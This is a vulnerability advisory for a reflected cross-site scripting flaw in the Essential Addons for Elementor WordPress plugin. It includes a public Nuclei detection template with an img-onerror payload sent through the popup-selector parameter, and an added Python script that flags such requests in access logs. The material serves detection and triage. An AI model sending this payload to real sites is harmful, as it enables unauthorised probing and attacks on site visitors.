CVE-2025-24752: Essential Addons for Elementor < 6.0.15 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Essential Addons for Elementor | PoC: Public

Vulnerability description

A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.

PoC code [public]

id: CVE-2025-24752

info:
  name: Essential Addons for Elementor < 6.0.15 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.
  reference:
    - https://www.tenable.com/plugins/was/114609
    - https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
    - https://github.com/Sachinart/essential-addons-for-elementor-xss-poc/blob/main/poc.py
  classification:
    epss-score: 0.03132
    epss-percentile: 0.86373
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/essential-addons-for-elementor-lite"
  tags: cve,cve2025,xss,essential,elementor-lite,vkev

variables:
  random_int: '{{rand_int(1,1000)}}'

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/?popup-selector=<img_src%3Dx_onerror%3Dalert%28%27{{random_int}}n%27%29>&eael-lostpassword=1'
        action: navigate

      - action: waitdialog
        name: subdomain_object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - subdomain_object_dom == true

      - type: word
        part: body
        words:
          - "{{random_int}}"
        case-insensitive: true
# digest: 490a0046304402206659b3e194ade586fffadfdd6e9c32d9f56e2780e07afe48f8704f7ad2cd50090220581e2071fdc9479bad04346def33cbe5927d2534ddff7b911c252a9f54680269:922c64590222798bb761d5b6d8e72950
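
For triage on the defending side, the request shape used by the template above (a popup-selector query parameter carrying markup, sent together with eael-lostpassword=1) can be searched for in web server access logs. The script below is an added example, not part of the original template or of the plugin's code; the combined log format, the two regular expressions and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address and request target of a combined-format access log entry (assumed format).
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A CSS selector never needs "<", and an "on...=" token that does not continue
# a longer word is an inline event-handler attribute, not selector syntax.
MARKUP = re.compile(r"<|(?<![a-z])on[a-z]+\s*=", re.IGNORECASE)

def decoded(value, rounds=2):
    """Undo extra layers of percent-encoding so %253C is still seen as '<'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def flag_requests(lines):
    """Return (client_ip, decoded_value) for popup-selector values carrying markup."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in params.get("popup-selector", []):
            value = decoded(raw)
            if MARKUP.search(value):
                hits.append((m["ip"], value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.5 - - [01/Aug/2025:10:00:00 +0000] "GET /?eael-lostpassword=1&popup-selector=%23eael-popup HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2025:10:02:11 +0000] "GET /?popup-selector=%3Cimg_src%3Dx_onerror%3Dalert%28%27123n%27%29%3E&eael-lostpassword=1 HTTP/1.1" 200 5300',
    '192.0.2.44 - - [01/Aug/2025:10:03:40 +0000] "GET /?popup-selector=%253Cimg_src%253Dx%253E&eael-lostpassword=1 HTTP/1.1" 200 5290',
    '203.0.113.9 - - [01/Aug/2025:10:04:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, value in flag_requests(SAMPLE):
        print(ip, value)
```

A hit only shows that such a request reached the site; whether it rendered depends on the installed plugin version, which the advisory gives as fixed in 6.0.15.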
